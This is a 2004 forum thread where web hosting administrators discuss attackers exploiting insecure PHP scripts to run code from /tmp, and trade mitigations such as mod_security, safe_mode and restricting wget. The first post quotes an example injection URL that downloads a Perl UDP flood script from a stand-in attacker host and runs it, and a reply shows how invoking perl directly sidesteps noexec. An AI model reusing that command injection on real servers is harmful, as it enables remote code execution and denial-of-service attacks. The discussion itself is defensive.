The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

More /tmp Security Problems.

Discussion in 'Security' started by HostDime, Feb 4, 2004.

  1. HostDime

    HostDime Well-Known Member
    PartnerNOC

    Joined:
    Mar 15, 2003
    Messages:
    81
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Orlando, Florida
    Now before anyone yells, all our servers have /tmp noexec,nosuid,nodev. This is all good for compiling, running programs but heres the problem now... Many writers are writing insecure PHP journal scripts, and many other php programs which are vunerable. Lately I saw udp.pl on a server when it was a little slow. It seems they had gotten the program installed via

    http://userssite.com/index.php?x=cd /tmp;wget mysuperhackerpalace.com/udp.pl;/usr/bin/perl udp.pl 127.0.0.1

    Now thats not the exact script, their site, and they didnt DDos localhost. Im giving everyone an idea. Now... Anyone really poses a threat on your server now. Simple PHP Shell + udp.pl = DDos. And even if the person did not do it (the case with the insecure php script, every account poses a threat. I have basically just been searching logs, /tmp for any traces for now. What could be a fix on this? Could you somehow make perl not run scripts from tmp? Sigh.

    :rolleyes:
     
  2. Marty

    Marty Well-Known Member

    Joined:
    Oct 10, 2001
    Messages:
    630
    Likes Received:
    1
    Trophy Points:
    18
    mmm, that is interesting.

    I think mod_security would probably deflect the request before they were able to upload. We just started running this on our servers.

    www.modsecurity.org
     
  3. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    If wget is not used by any users (except for root) then a simple fix would be to chmod wget to 700.
     
  4. Silverado

    Silverado Well-Known Member

    Joined:
    Mar 19, 2003
    Messages:
    154
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Backyard - Poolside
    doesn't /scripts/securetmp take good care of this issue?

    I used it on all my servers and it works great.
     
  5. HostDime

    HostDime Well-Known Member
    PartnerNOC

    Joined:
    Mar 15, 2003
    Messages:
    81
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Orlando, Florida
    No It does not. You can have noexec,nosuid,nodev,nouser and perl will work.
     
  6. rs-freddo

    rs-freddo Well-Known Member

    Joined:
    May 13, 2003
    Messages:
    832
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    If you use the securetmp system it basically stops:
    /tmp/hacker.pl
    from being executed
    however it does not stop:
    /usr/bin/perl /tmp/hacker.pl
    why?
    because in the first instance you are executing a script in /tmp
    in the second instance you are executing software in /usr/bin and just parsing the file in /tmp.

    This is why I'm pushing cPanel for a chrooted filesystem. Securetmp will only work for the REALLY DUMB hackers. Securetmp is only a very temporary bandaid.
     
  7. Website Rob

    Website Rob Well-Known Member

    Joined:
    Mar 23, 2002
    Messages:
    1,506
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    Alberta, Canada
    cPanel Access Level:
    Root Administrator
    As security is done in layers, having safe_mode "ON" would have prevented the upload to the 'tmp' and stopped the problem before it could start. Others may not agree with using this method, but I have found majority of scripts (PHP) do not require it to be "OFF" and those that do make a request so it can be setup -- for their account.

    Keeping track of who has safe_mode "OFF" makes it easy to track, when 'tmp' is used for nefarious purposes.
     
  8. damainman

    damainman Well-Known Member

    Joined:
    Nov 13, 2003
    Messages:
    515
    Likes Received:
    0
    Trophy Points:
    16
    You can have safemode on/off per user account?
     
Loading...

Share This Page